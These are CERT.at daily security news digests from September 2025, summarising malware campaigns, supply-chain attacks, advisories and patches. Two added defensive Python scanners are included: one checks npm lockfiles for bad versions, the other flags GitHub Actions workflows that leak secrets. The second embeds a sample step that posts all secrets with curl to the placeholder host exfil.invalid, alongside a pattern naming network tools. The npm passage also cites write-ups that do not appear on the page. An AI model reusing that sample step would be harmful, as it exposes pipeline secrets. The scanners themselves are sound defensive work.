Security updates have been issued by Fedora (buildah, containers-common, glycin, loupe, podman, rust-matchers, and rust-tracing-subscriber), Red Hat (fence-agents, jackson-annotations, jackson-core, jackson-databind, jackson-jaxrs-providers, and jackson-modules-base, pki-deps:10.6, python-requests, python3.12-cryptography, redis:6, redis:7, and resource-agents), Slackware (libssh), SUSE (aide, cloud-init, iperf, java-1_8_0-openjdk, jq, kernel-devel, python-deepdiff, regionServiceClientConfigAzure, regionServiceClientConfigEC2, and regionServiceClientConfigGCE), and Ubuntu (gnutls28).
---------------------------------------------
https://lwn.net/Articles/1037471/
∗∗∗ CISA Releases Fourteen Industrial Control Systems Advisories ∗∗∗
---------------------------------------------
ICSA-25-252-01 Rockwell Automation ThinManager,
ICSA-25-252-02 ABB Cylon Aspect BMS/BAS,
ICSA-25-252-03 Rockwell Automation Stratix IOS,
ICSA-25-252-04 Rockwell Automation FactoryTalk Optix,
ICSA-25-252-05 Rockwell Automation FactoryTalk Activation Manager,
ICSA-25-252-06 Rockwell Automation CompactLogix® 5480,
ICSA-25-252-07 Rockwell Automation ControlLogix 5580,
ICSA-25-252-08 Rockwell Automation Analytics LogixAI,
ICSA-25-252-09 Rockwell Automation 1783-NATR
---------------------------------------------
https://www.cisa.gov/news-events/alerts/2025/09/09/cisa-releases-fourteen-i…
∗∗∗ Google Chrome: Stable Channel Update for Desktop ∗∗∗
---------------------------------------------
http://chromereleases.googleblog.com/2025/09/stable-channel-update-for-desk…
=====================
= End-of-Day report =
=====================
Timeframe: Montag 08-09-2025 18:00 − Dienstag 09-09-2025 18:00
Handler: Felician Fuchs
Co-Handler: Guenes Holler
=====================
= News =
=====================
∗∗∗ TOR-Based Cryptojacking Attack Expands Through Misconfigured Docker APIs ∗∗∗
---------------------------------------------
Cybersecurity researchers have discovered a variant of a recently disclosed campaign that abuses the TOR network for cryptojacking attacks targeting exposed Docker APIs. Akamai, which discovered the latest activity last month, said it's designed to block other actors from accessing the Docker API from the internet.
---------------------------------------------
https://thehackernews.com/2025/09/tor-based-cryptojacking-attack-expands.ht…
∗∗∗ GitHub Account Compromise Led to Salesloft Drift Breach Affecting 22 Companies ∗∗∗
---------------------------------------------
Salesloft has revealed that the data breach linked to its Drift application started with the compromise of its GitHub account. Google-owned Mandiant, which began an investigation into the incident, said the threat actor, tracked as UNC6395, accessed the Salesloft GitHub account from March through June 2025. It's currently not known how the digital intruders gained access to the GitHub account.
---------------------------------------------
https://thehackernews.com/2025/09/github-account-compromise-led-to.html
∗∗∗ RatOn Android Malware Detected With NFC Relay and ATS Banking Fraud Capabilities ∗∗∗
---------------------------------------------
A new Android malware called RatOn evolved from a basic tool capable of conducting Near Field Communication (NFC) attacks to a sophisticated remote access trojan with Automated Transfer System (ATS) capabilities to conduct device fraud.
---------------------------------------------
https://thehackernews.com/2025/09/raton-android-malware-detected-with-nfc.h…
∗∗∗ Axios Abuse and Salty 2FA Kits Fuel Advanced Microsoft 365 Phishing Attacks ∗∗∗
---------------------------------------------
Threat actors are abusing HTTP client tools like Axios in conjunction with Microsoft's Direct Send feature to form a "highly efficient attack pipeline" in recent phishing campaigns, according to new findings from ReliaQuest.
---------------------------------------------
https://thehackernews.com/2025/09/axios-abuse-and-salty-2fa-kits-fuel.html
∗∗∗ Salt Typhoon and UNC4841: Silent Push Discovers New Domains; Urges Defenders to Check Telemetry and Log Data ∗∗∗
---------------------------------------------
Silent Push has identified dozens of previously unreported domains, all aiming to obtain long-term, stealthy access to targeted organizations, used by the Chinese APT group, Salt Typhoon, along with some related People’s Republic of China (PRC) state-backed threat actors.
---------------------------------------------
https://www.silentpush.com/blog/salt-typhoon-2025/
∗∗∗ BSI warns: "Digital attack surfaces in the automotive sector are growing rapidly" ∗∗∗
---------------------------------------------
Digital services, over-the-air updates, AI and networked control units now shape vehicle architectures, the BSI notes. Manufacturers and suppliers must take precautions.
---------------------------------------------
https://www.heise.de/news/BSI-warnt-Digitale-Angriffsflaechen-im-Automobils…
∗∗∗ Security updates for Tuesday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (kernel and kernel-rt), Debian (openafs and qemu), Fedora (buildah, containers-common, podman, python-flask, and snapshot), Mageia (postgresql, python-django, and udisks2), Oracle (kernel and libxml2), Red Hat (apache-commons-beanutils, firefox, httpd, httpd:2.4, kernel, kernel-rt, mod_http2, qt5-qt3d, and thunderbird), Slackware (libxml2), SUSE (firebird, go1.25-openssl, ImageMagick, microcode_ctl, netty, netty-tcnative, and ovmf), and Ubuntu (libetpan and postgresql-14, postgresql-16, postgresql-17).
---------------------------------------------
https://lwn.net/Articles/1037308/
∗∗∗ Unmasking The Gentlemen Ransomware: Tactics, Techniques, and Procedures Revealed ∗∗∗
---------------------------------------------
An analysis of the Gentlemen ransomware group, which employs advanced, adaptive tactics, techniques, and procedures to target critical industries worldwide.
---------------------------------------------
https://www.trendmicro.com/en_us/research/25/i/unmasking-the-gentlemen-rans…
∗∗∗ Zero-Day in Sitecore Exploited to Deploy WEEPSTEEL Malware ∗∗∗
---------------------------------------------
Hackers exploit a Sitecore zero-day (CVE-2025-53690) to deploy WEEPSTEEL Malware via ViewState attacks, enabling Remote Code Execution (RCE).
---------------------------------------------
https://hackread.com/zero-day-sitecore-exploited-deploy-weepsteel-malware/
∗∗∗ OpenAI paper: hallucinations apparently unavoidable ∗∗∗
---------------------------------------------
A new scientific paper published by OpenAI deals with hallucinations: false information and connections produced by large language models (LLMs) and therefore also by AI chatbots. All AI companies are working to keep hallucinations as low as possible; eliminating them entirely appears impossible, and OpenAI itself now says so.
---------------------------------------------
https://heise.de/-10637744
∗∗∗ LockBit Attempts Comeback with LockBit 5.0 Ransomware Release ∗∗∗
---------------------------------------------
LockBit was once the most feared ransomware group until global law enforcement action sent the group into decline last year. Now the threat group hopes to mount a comeback with LockBit 5.0.
---------------------------------------------
https://thecyberexpress.com/lockbit-5-0-ransomware/
=====================
= Vulnerabilities =
=====================
∗∗∗ Adobe patches critical SessionReaper flaw in Magento eCommerce platform ∗∗∗
---------------------------------------------
Adobe is warning of a critical vulnerability (CVE-2025-54236) in its Commerce and Magento Open Source platforms that researchers call SessionReaper and describe as one of " the most severe" flaws in the history of the product.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/adobe-patches-critical-sessi…
∗∗∗ Popular JavaScript packages tampered with ∗∗∗
---------------------------------------------
A number of popular JavaScript packages were recently tampered with in order to manipulate cryptocurrency transactions. The cause of this supply-chain attack appears to have been a successful phishing attack against the maintainer of these packages and their npm account. The tampered versions of the affected packages have already been withdrawn.
---------------------------------------------
https://www.cert.at/de/aktuelles/2025/9/populare-javascript-pakete-manipuli…
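The three npm compromises on this page (the Check Point write-up of the September 8 maintainer-account phishing, the DuckDB advisory, and the CERT.at note above) all have the same practical follow-up: find out whether a known-bad version is pinned anywhere in your lockfiles, including nested copies that `npm ls` may not show. The scanner below is an added example, not code from CERT.at, Check Point or the DuckDB project. Its deny list is constructed (the duckdb 1.3.3 entry is taken from the advisory title; the second entry is a placeholder), and both sample lockfiles are constructed.

```python
"""Find deny-listed npm package versions anywhere in a package-lock.json.

Added example; not code from CERT.at, Check Point or the DuckDB project.
Handles lockfileVersion 1 (nested "dependencies") and 2/3 (flat "packages"
keyed by install path). DENY_LIST is constructed: duckdb 1.3.3 comes from
the advisory title on this page, the other entry is a placeholder.
"""
import json

DENY_LIST = {
    "duckdb": {"1.3.3"},
    "example-compromised-pkg": {"4.0.1"},   # placeholder, not a real advisory
}


def _walk_v1(deps, prefix, out):
    # v1 nests transitive deps under each entry's own "dependencies"
    for name, info in deps.items():
        path = f"{prefix}>{name}" if prefix else name
        out.append((name, info.get("version"), path))
        _walk_v1(info.get("dependencies", {}), path, out)


def installed_packages(lock):
    """Return [(name, version, install_path)] for every package the lockfile pins."""
    out = []
    if "packages" in lock:                                   # lockfileVersion 2/3
        for key, info in lock["packages"].items():
            if key == "":                                    # root project entry
                continue
            # key is an install path like "node_modules/a/node_modules/@s/b";
            # the package name is everything after the last "node_modules/"
            name = key.rsplit("node_modules/", 1)[-1]
            out.append((name, info.get("version"), key))
    else:                                                    # lockfileVersion 1
        _walk_v1(lock.get("dependencies", {}), "", out)
    return out


def find_denied(lock, deny=DENY_LIST):
    """Every install of a denied version, nested copies included."""
    return [(n, v, p) for n, v, p in installed_packages(lock) if v in deny.get(n, ())]


def scan_lockfile(path, deny=DENY_LIST):
    with open(path, encoding="utf-8") as fh:
        return find_denied(json.load(fh), deny)


# Constructed samples. V3: a direct duckdb 1.3.3 plus a nested clean copy.
SAMPLE_LOCK_V3 = json.loads("""{
  "name": "app", "lockfileVersion": 3,
  "packages": {
    "": {"name": "app", "dependencies": {"duckdb": "^1.3.0"}},
    "node_modules/duckdb": {"version": "1.3.3"},
    "node_modules/some-lib": {"version": "2.0.0"},
    "node_modules/some-lib/node_modules/duckdb": {"version": "1.3.2"}
  }
}""")

# V1: the bad version is only pulled in transitively by some-lib.
SAMPLE_LOCK_V1 = {
    "lockfileVersion": 1,
    "dependencies": {
        "some-lib": {"version": "2.0.0",
                     "dependencies": {"duckdb": {"version": "1.3.3"}}},
        "duckdb": {"version": "1.3.2"},
    },
}

if __name__ == "__main__":
    for lock in (SAMPLE_LOCK_V3, SAMPLE_LOCK_V1):
        for name, version, where in find_denied(lock):
            print(f"DENIED {name}@{version} at {where}")
```

Run `scan_lockfile("package-lock.json")` against every checkout and CI cache you control; a hit in a nested path means a dependency of yours pulled the bad version in, so pinning your own direct dependency is not enough on its own.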
∗∗∗ September 2025 Security Update ∗∗∗
---------------------------------------------
Ivanti is disclosing vulnerabilities in Ivanti Endpoint Manager (EPM) and Ivanti Connect Secure, Policy Secure, ZTA Gateways and Neurons for Secure Access.
---------------------------------------------
https://www.ivanti.com/blog/september-2025-security-update
∗∗∗ SAP Security Patch Day – September 2025 ∗∗∗
---------------------------------------------
SAP has released its September 2025 security patch package containing 26 security notes addressing critical vulnerabilities across enterprise SAP environments. This release includes four HotNews vulnerabilities with CVSS ratings up to 10.0, four High priority issues, sixteen Medium priority fixes, and two Low priority updates. The patches affect NetWeaver AS Java, S/4HANA, SAP HCM, Business Planning and Consolidation, Commerce Cloud, and SAP Business One.
---------------------------------------------
https://redrays.io/blog/sap-security-patch-day-september-2025/
∗∗∗ VU#461364: Hiawatha open-source web server has multiple vulnerabilities ∗∗∗
---------------------------------------------
https://kb.cert.org/vuls/id/461364
=====================
= End-of-Day report =
=====================
Timeframe: Freitag 05-09-2025 18:00 − Montag 08-09-2025 18:00
Handler: Guenes Holler
Co-Handler: Michael Schlagenhaufer
=====================
= News =
=====================
∗∗∗ iCloud Calendar abused to send phishing emails from Apple’s servers ∗∗∗
---------------------------------------------
iCloud Calendar invites are being abused to send callback phishing emails disguised as purchase notifications directly from Apple's email servers, making them more likely to bypass spam filters to land in targets' inboxes.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/icloud-calendar-abused-to-se…
∗∗∗ Fraunhofer SIT gives up: Volksverschlüsselung is being discontinued ∗∗∗
---------------------------------------------
Volksverschlüsselung, a joint initiative of the Fraunhofer Institute for Secure Information Technology (SIT) and Deutsche Telekom, will be discontinued on 31 January 2026 after roughly ten years. This is stated in an announcement on the project's website. The goal of Volksverschlüsselung was to make end-to-end encrypted communication more user-friendly, but the project met with criticism from the start.
---------------------------------------------
https://www.golem.de/news/fraunhofer-sit-gibt-auf-die-volksverschluesselung…
∗∗∗ Noisy Bear Campaign Targeting Kazakhstan Energy Sector Outed as a Planned Phishing Test ∗∗∗
---------------------------------------------
A threat actor possibly of Russian origin has been attributed to a new set of attacks targeting the energy sector in Kazakhstan. The activity, codenamed Operation BarrelFire, is tied to a new threat group tracked by Seqrite Labs as Noisy Bear. The threat actor has been active since at least April 2025.
---------------------------------------------
https://thehackernews.com/2025/09/noisy-bear-targets-kazakhstan-energy.html
∗∗∗ GPUGate Malware Uses Google Ads and Fake GitHub Commits to Target IT Firms ∗∗∗
---------------------------------------------
Cybersecurity researchers have detailed a new sophisticated malware campaign that leverages paid ads on search engines like Google to deliver malware to unsuspecting users looking for popular tools like GitHub Desktop. While malvertising campaigns have become commonplace in recent years, the latest activity gives it a little twist of its own: Embedding a GitHub commit into a page URL containing altered links that point to attacker-controlled infrastructure.
---------------------------------------------
https://thehackernews.com/2025/09/gpugate-malware-uses-google-ads-and.html
∗∗∗ Netflix phishing e-mail in circulation ∗∗∗
---------------------------------------------
An e-mail purporting to come from Netflix is currently circulating. It claims that an update of the account details is required; otherwise a fee of EUR 8.99 would be charged and access restricted. Caution: it is a fake! The message leads to a phishing website through which criminals try to steal account credentials.
---------------------------------------------
https://www.watchlist-internet.at/news/netflix-phishing-mail-im-umlauf-1/
∗∗∗ Blurring the Lines: Intrusion Shows Connection With Three Major Ransomware Gangs ∗∗∗
---------------------------------------------
The intrusion began in September 2024 with a download of a malicious file mimicking the EarthTime application by DeskSoft. Upon execution, SectopRAT was deployed which opened a connection to its command and control (C2) infrastructure. The threat actor established persistence by relocating the malicious file and placing a shortcut in the Startup folder, configured to trigger on user logon. They further elevated access by creating a new local account and assigning it local administrative privileges.
---------------------------------------------
https://thedfirreport.com/2025/09/08/blurring-the-lines-intrusion-shows-con…
∗∗∗ GhostAction Attack Steals 3,325 Secrets from GitHub Projects ∗∗∗
---------------------------------------------
On September 2, 2025, a GitHub user known as Grommash9 committed a new workflow file to the FastUUID project. The file, labelled “Github Actions Security,” appeared similar to routine automation scripts but was later found to contain malicious code designed to collect CI/CD secrets and send them to an external server.
---------------------------------------------
https://hackread.com/ghostaction-attack-steals-github-projects-secrets/
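A workflow that collects CI/CD secrets and posts them to an external server, as described above, is visible in the workflow text itself: an expression such as `${{ toJSON(secrets) }}` materialises every repository secret, and a `run:` step then hands it to a network client. The scanner below is an added example, not code from the article or from any of the affected projects. It is a heuristic check over raw workflow YAML (no YAML parser, so step boundaries are approximated by `- <step key>:` lines), and the sample workflow, including the host `exfil.invalid`, is constructed.

```python
"""Heuristic scan of a GitHub Actions workflow for secret exfiltration.

Added example; not code from the article or any affected project. Works on
the raw workflow text without a YAML parser, so step boundaries are
approximated by '- <step key>:' lines. Flags (a) toJSON(secrets), which
materialises every secret, and (b) steps that run a network client against
a host outside ALLOWED_HOSTS, rated high when the same step touches secrets.
The sample workflow and the host exfil.invalid are constructed.
"""
import re

SECRET_REF = re.compile(r"\$\{\{\s*secrets\.([A-Za-z_][A-Za-z0-9_]*)\s*\}\}")
DUMP_ALL = re.compile(r"toJSON\s*\(\s*secrets\s*\)", re.I)
URL_HOST = re.compile(r"https?://([A-Za-z0-9.\-]+)")
NET_CLIENT = re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr|nc|ncat)\b")
STEP_START = re.compile(r"^\s*-\s+(name|uses|run|id|if|env|with|shell):")
ALLOWED_HOSTS = {"github.com", "api.github.com", "registry.npmjs.org", "upload.pypi.org"}


def split_steps(text):
    """Return [(first_line_no, step_text)]; text before the first step is its own chunk."""
    lines = text.splitlines()
    starts = [i for i, line in enumerate(lines) if STEP_START.match(line)]
    bounds = [0] + starts + [len(lines)]
    return [(a + 1, "\n".join(lines[a:b])) for a, b in zip(bounds, bounds[1:]) if b > a]


def scan_workflow(text, allowed_hosts=ALLOWED_HOSTS):
    """Return [(line_no, severity, reason)] in workflow order."""
    findings = []
    for line_no, step in split_steps(text):
        secrets = set(SECRET_REF.findall(step))
        dumps_all = bool(DUMP_ALL.search(step))
        foreign = set()
        for line in step.splitlines():
            if NET_CLIENT.search(line):
                foreign.update(h for h in URL_HOST.findall(line) if h not in allowed_hosts)
        if dumps_all:
            findings.append((line_no, "high", "materialises every secret via toJSON(secrets)"))
        if foreign:
            sev = "high" if (secrets or dumps_all) else "medium"
            findings.append((line_no, sev,
                             "network client contacts non-allowlisted host(s): " + ", ".join(sorted(foreign))))
    return findings


# Constructed sample: a benign test step, a collector step that dumps all
# secrets and posts them, and a legitimate publish step that uses one secret.
SAMPLE_WORKFLOW = """\
name: Github Actions Security
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Run tests
        run: |
          pip install -e .
          pytest
      - name: Collect
        env:
          ALL: ${{ toJSON(secrets) }}
        run: |
          curl -s -X POST -d "$ALL" https://exfil.invalid/collect
      - name: Publish
        env:
          TWINE_PASSWORD: ${{ secrets.PYPI_TOKEN }}
        run: twine upload dist/*
"""

if __name__ == "__main__":
    for line_no, sev, reason in scan_workflow(SAMPLE_WORKFLOW):
        print(f"line {line_no} [{sev}]: {reason}")
```

The check is deliberately conservative about what it calls high: a step that only references a single secret and never runs a network client (the publish step in the sample) is not reported, while any `toJSON(secrets)` is reported on its own because there is almost no legitimate reason to serialise the whole secret store. Extend `ALLOWED_HOSTS` with the registries and artifact stores your pipelines genuinely talk to, and treat a hit as a reason to rotate the secrets, not just to delete the workflow.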
∗∗∗ Lazarus Group Deploys Malware With ClickFix Scam in Fake Job Interviews ∗∗∗
---------------------------------------------
A recent investigation by SentinelLABS and internet intelligence platform Validin reveals that North Korean threat actors behind the Contagious Interview campaign are actively abusing public cybersecurity platforms like Validin, Maltrail, and VirusTotal to improve their malicious activities.
---------------------------------------------
https://hackread.com/lazarus-group-malware-clickfix-scam-fake-job-interview/
∗∗∗ MostereRAT Deployed AnyDesk/TightVNC for Covert Full Access ∗∗∗
---------------------------------------------
FortiGuard Labs recently discovered a phishing campaign that employs multiple advanced evasion techniques. These include the use of an Easy Programming Language (EPL) to develop a staged payload, concealing malicious operations and disabling security tools to prevent alert triggers, securing Command and Control (C2) communications using mutual TLS (mTLS), supporting various methods for deploying additional payloads, and even installing popular remote access tools to grant attackers complete control over the compromised system.
---------------------------------------------
https://feeds.fortinet.com/~/924516446/0/fortinet/blogs~MostereRAT-Deployed…
∗∗∗ Ecovacs Deebot: attackers can inject arbitrary code ∗∗∗
---------------------------------------------
Vulnerability descriptions published over the weekend discuss security flaws, some of them high-risk, in Ecovacs robot vacuum cleaners. Updates that close the holes have been available for some time for the affected Deebot models. Owners should make sure that both the base stations and the robots are brought up to date.
---------------------------------------------
https://heise.de/-10636233
=====================
= Vulnerabilities =
=====================
∗∗∗ Security updates for Monday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (chromium, libhtp, modsecurity-apache, shibboleth-sp, and wireless-regdb), Fedora (chromium, kea, tcpreplay, and yq), Mageia (rootcerts, nspr, nss & firefox and thunderbird), Red Hat (python3), and SUSE (7zip, chromedriver, go1.25, libQt5Pdf5, libsixel-bash-completion, libsoup2, libwireshark18, netty, rav1e, and trivy).
---------------------------------------------
https://lwn.net/Articles/1037157/
∗∗∗ RICOH Streamline NX vulnerable to tampering with operation history ∗∗∗
---------------------------------------------
https://jvn.jp/en/jp/JVN75307484/
∗∗∗ CVE-2025-8699: NFC Card Vulnerability Exploitation Leading to Free Top-Up in KioSoft "Stored Value" Unattended Payment Solution ∗∗∗
---------------------------------------------
https://sec-consult.com/vulnerability-lab/advisory/nfc-card-vulnerability-e…
∗∗∗ Beckhoff Security Advisory 2025-001: CVE-2025-41701 ∗∗∗
---------------------------------------------
https://download.beckhoff.com/download/document/product-security/Advisories…
=====================
= End-of-Day report =
=====================
Timeframe: Donnerstag 04-09-2025 18:00 − Freitag 05-09-2025 18:00
Handler: Alexander Riepl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ The number of mis-issued 1.1.1.1 certificates grows. Here’s the latest. ∗∗∗
---------------------------------------------
Everything to know about the mishap that threatened to expose millions of users queries.
---------------------------------------------
https://arstechnica.com/information-technology/2025/09/the-number-of-mis-is…
∗∗∗ Max severity Argo CD API flaw leaks repository credentials ∗∗∗
---------------------------------------------
An Argo CD vulnerability allows API tokens with even low project-level get permissions to access API endpoints and retrieve all repository credentials associated with the project.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/max-severity-argo-cd-api-fla…
∗∗∗ Known since May 2024: TP-Link confirms zero-day flaw in Archer routers ∗∗∗
---------------------------------------------
TP-Link models sold in this country are also affected. Under certain circumstances attackers can inject malicious code remotely.
---------------------------------------------
https://www.golem.de/news/seit-mai-2024-bekannt-tp-link-bestaetigt-zero-day…
∗∗∗ IT threat evolution in Q2 2025. Mobile statistics ∗∗∗
---------------------------------------------
The report contains statistics on mobile threats (malware, adware, and unwanted software for Android) for Q2 2025, as well as a description of the most notable malware types identified during the reporting period.
---------------------------------------------
https://securelist.com/malware-report-q2-2025-mobile-statistics/117349/
∗∗∗ IT threat evolution in Q2 2025. Non-mobile statistics ∗∗∗
---------------------------------------------
The report presents statistics for Windows, macOS, IoT, and other threats, including ransomware, miners, local and web-based threats, for Q2 2025.
---------------------------------------------
https://securelist.com/malware-report-q2-2025-pc-iot-statistics/117421/
∗∗∗ SAP S/4HANA Critical Vulnerability CVE-2025-42957 Exploited in the Wild ∗∗∗
---------------------------------------------
A critical security vulnerability impacting SAP S/4HANA, an Enterprise Resource Planning (ERP) software, has come under active exploitation in the wild. The command injection vulnerability, tracked as CVE-2025-42957 (CVSS score: 9.9), was fixed by SAP as part of ..
---------------------------------------------
https://thehackernews.com/2025/09/sap-s4hana-critical-vulnerability-cve.html
∗∗∗ Vulnerabilities: Nvidia AI and networking technology is attackable ∗∗∗
---------------------------------------------
Security updates close holes in, among other products, Nvidia's AI platforms DGX and HGX.
---------------------------------------------
https://www.heise.de/news/Sicherheitsluecken-Nvidia-KI-und-Netzwerktechnik-…
∗∗∗ Stealerium malware secretly takes webcam photos for extortion ∗∗∗
---------------------------------------------
The freely available Stealerium malware detects porn consumption and secretly captures webcam images. Cybercriminals use the photos for extortion.
---------------------------------------------
https://www.heise.de/news/Malware-fotografiert-Nutzer-heimlich-bei-Porno-Ko…
∗∗∗ Cyberattack forces Jaguar Land Rover to tell staff to stay at home ∗∗∗
---------------------------------------------
Luxury automaker Jaguar Land Rover says employees should stay home through the weekend as it works to mitigate the impact of a cyberattack.
---------------------------------------------
https://therecord.media/jaguar-land-rover-cyberattack-workers-stay-home
∗∗∗ SEO fraud-as-a-service scheme hijacks Windows servers to promote gambling websites ∗∗∗
---------------------------------------------
A malware campaign dubbed GhostRedirector by researchers at ESET attempts to compromise websites to drive traffic to gambling sites.
---------------------------------------------
https://therecord.media/seo-scheme-windows-malware-gambling-sites-ghostredi…
∗∗∗ Scammers Exploit Grok AI With Video Ad Scam to Push Malware on X ∗∗∗
---------------------------------------------
Researchers at Guardio Labs have uncovered a new “Grokking” scam where attackers trick Grok AI into spreading malicious…
---------------------------------------------
https://hackread.com/scammers-exploit-grok-ai-video-ad-scam-x-malware/
∗∗∗ Microsoft enforces more multi-factor authentication ∗∗∗
---------------------------------------------
Microsoft is updating its plans for "Phase 2" of enforced multi-factor authentication for Azure. On 1 October, more services are due.
---------------------------------------------
https://heise.de/-10633932
∗∗∗ Czechia Warns of Chinese Data Transfers and Remote Administration for Espionage ∗∗∗
---------------------------------------------
Czechia’s national cybersecurity watchdog has issued a warning about foreign cyber operations, focussed on Chinese data transfers and remote administration, urging both government bodies and private businesses to bolster defenses amid rising espionage campaigns tied to China and Russia. The alert, published this week by the National Cyber and I..
---------------------------------------------
https://thecyberexpress.com/czechia-warns-of-chinese-data-transfer/
=====================
= Vulnerabilities =
=====================
∗∗∗ Security updates for Friday ∗∗∗
---------------------------------------------
Security updates have been issued by Fedora (udisks2), Oracle (httpd:2.4 and kernel), Red Hat (python-requests), and SUSE (chromium, gn, dcmtk, firefox, himmelblau, nginx, perl-Authen-SASL, perl-Crypt-URandom, postgresql15, python-Django, and python-maturin).
---------------------------------------------
https://lwn.net/Articles/1036907/
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/mailman3/postorius/lists/daily.lists.cert.at/
=====================
= End-of-Day report =
=====================
Timeframe: Wednesday 03-09-2025 18:00 − Thursday 04-09-2025 18:00
Handler: Alexander Riepl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Mis-issued certificates for 1.1.1.1 DNS service pose a threat to the Internet ∗∗∗
---------------------------------------------
The three certificates were issued in May but only came to light Wednesday.
---------------------------------------------
https://arstechnica.com/security/2025/09/mis-issued-certificates-for-1-1-1-…
∗∗∗ Automated Sextortion Spyware Takes Webcam Pics of Victims Watching Porn ∗∗∗
---------------------------------------------
A new specimen of “infostealer” malware offers a disturbing feature: It monitors a target's browser for NSFW content, then takes simultaneous screenshots and webcam photos of the victim.
---------------------------------------------
https://www.wired.com/story/stealerium-infostealer-porn-sextortion/
∗∗∗ Serial offenders claim responsibility for IT attack on Jaguar Land Rover ∗∗∗
---------------------------------------------
Three British criminal gangs have apparently joined forces. They are boasting about the IT attack on Jaguar Land Rover.
---------------------------------------------
https://www.heise.de/news/Serientaeter-bekennen-sich-zu-IT-Angriff-auf-Jagu…
∗∗∗ Critical infrastructure: attacks on industrial control systems possible ∗∗∗
---------------------------------------------
Important security updates for industrial control systems from Hitachi, among other vendors, have been released. One patch is still pending.
---------------------------------------------
https://www.heise.de/news/Kritische-Infrastrukturen-Attacken-auf-industriel…
∗∗∗ TP-Link warns of botnet infecting routers and targeting Microsoft 365 accounts ∗∗∗
---------------------------------------------
The Quad7 botnet is adding End-of-Life TP-Link routers to its arsenal and using them to steal Microsoft 365 accounts.
---------------------------------------------
https://www.malwarebytes.com/blog/news/2025/09/tp-link-warns-of-botnet-infe…
∗∗∗ Microsoft support scam: phishing trap instead of online help ∗∗∗
---------------------------------------------
If a pop-up window urges you to call the Microsoft helpline, the utmost caution is advised! Behind the prompt there are no IT experts waiting to help with computer problems. Rather, criminals are using this route to gain access to their victims' accounts.
---------------------------------------------
https://www.watchlist-internet.at/news/microsoft-support-betrug/
∗∗∗ Scattered Lapsus$ Hunters Demand Google Fire Security Experts or Face Data Leak ∗∗∗
---------------------------------------------
Scattered Lapsus$ Hunters threaten Google, demanding that two security experts, Austin Larsen of Google’s Threat Intelligence Group and Charles Carmakal of Mandiant, be fired or they will leak alleged stolen Google data.
---------------------------------------------
https://hackread.com/scattered-lapsus-hunters-google-fire-experts-data-leak/
∗∗∗ 25,000 IPs Scanned Cisco ASA Devices — New Vulnerability Potentially Incoming ∗∗∗
---------------------------------------------
GreyNoise observed two scanning surges against Cisco Adaptive Security Appliance (ASA) devices in late August including more than 25,000 unique IPs in a single burst. This activity represents a significant elevation above baseline, typically registering at less than 500 IPs per day.
---------------------------------------------
https://www.greynoise.io/blog/scanning-surge-cisco-asa-devices
∗∗∗ ViewState Deserialization Zero-Day Vulnerability in Sitecore Products (CVE-2025-53690) ∗∗∗
---------------------------------------------
In a recent investigation, Mandiant Threat Defense discovered an active ViewState deserialization attack affecting Sitecore deployments leveraging a sample machine key that had been exposed in Sitecore deployment guides from 2017 and earlier. An attacker leveraged the exposed ASP.NET machine keys to perform remote code ..
---------------------------------------------
https://cloud.google.com/blog/topics/threat-intelligence/viewstate-deserial…
∗∗∗ Cookie Chaos: How to bypass __Host and __Secure cookie prefixes ∗∗∗
---------------------------------------------
Browsers added cookie prefixes to protect your sessions and stop attackers from setting harmful cookies. In this post, you’ll see how to bypass cookie defenses using discrepancies in browser and ..
---------------------------------------------
https://portswigger.net/research/cookie-chaos-how-to-bypass-host-and-secure…
∗∗∗ Linux Kernel SMB 0-Day Vulnerability CVE-2025-37899 Uncovered Using ChatGPT o3 ∗∗∗
---------------------------------------------
For the first time, a zero-day vulnerability in the Linux kernel has been discovered using a large language model, OpenAI’s o3. Discovered by security researcher Sean Heelan and assigned ..
---------------------------------------------
https://www.upwind.io/feed/linux-kernel-smb-0-day-vulnerability-cve-2025-37…
∗∗∗ s1ngularity's Aftermath: AI, TTPs, and Impact in the Nx Supply Chain Attack ∗∗∗
---------------------------------------------
A deeper look at the Nx supply chain attack: analyzing the performance of AI-powered malware, calculating incident impact, and sharing novel TTPs for further investigation.
---------------------------------------------
https://www.wiz.io/blog/s1ngularitys-aftermath
∗∗∗ Nx Investigation Reveals GitHub Actions Workflow Exploit Led to npm Token Theft, Prompting Switch to Trusted Publishing ∗∗∗
---------------------------------------------
On August 26, 2025, the JavaScript ecosystem witnessed a watershed moment in supply chain security. The popular Nx build system, with over 4.6 million weekly downloads, fell victim to an attack that stole thousands of credentials and pioneered a disturbing new technique: weaponizing AI developer tools for scaling reconnaissance and data theft. The Nx team ..
---------------------------------------------
https://socket.dev/blog/nx-supply-chain-attack-investigation-github-actions…
∗∗∗ Exploit development for IBM i ∗∗∗
---------------------------------------------
At TROOPERS24, we demonstrated how IBM i systems – still widely used in enterprise environments – can be compromised in both authenticated and unauthenticated scenarios, using only built-in services and a basic understanding of the underlying mechanisms. Despite being labeled “legacy,” these systems remain active in finance, logistics, and manufacturing, often handling critical workloads with little attention paid to their security posture.
---------------------------------------------
https://blog.silentsignal.eu/2025/09/04/Exploit-development-for-IBM-i/
=====================
= End-of-Day report =
=====================
Timeframe: Tuesday 02-09-2025 18:00 − Wednesday 03-09-2025 18:00
Handler: Alexander Riepl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Hackers breach fintech firm in attempted $130M bank heist ∗∗∗
---------------------------------------------
Hackers tried to steal $130 million from Evertec's Brazilian subsidiary Sinqia S.A. after gaining unauthorized access to its environment on the central bank's real-time payment system (Pix).
---------------------------------------------
https://www.bleepingcomputer.com/news/security/hackers-breach-fintech-firm-…
∗∗∗ What Is a Passkey? Here’s How to Set Up and Use Them (2025) ∗∗∗
---------------------------------------------
Passkeys were built to enable a password-free future. Here's what they are and how you can start using them.
---------------------------------------------
https://www.wired.com/story/what-is-a-passkey-and-how-to-use-them/
∗∗∗ Patch day: critical malicious-code vulnerability threatens Android 15 and 16 ∗∗∗
---------------------------------------------
Important security updates close several security vulnerabilities in various Android versions.
---------------------------------------------
https://www.heise.de/news/Patchday-Kritische-Schadcode-Luecke-bedroht-Andro…
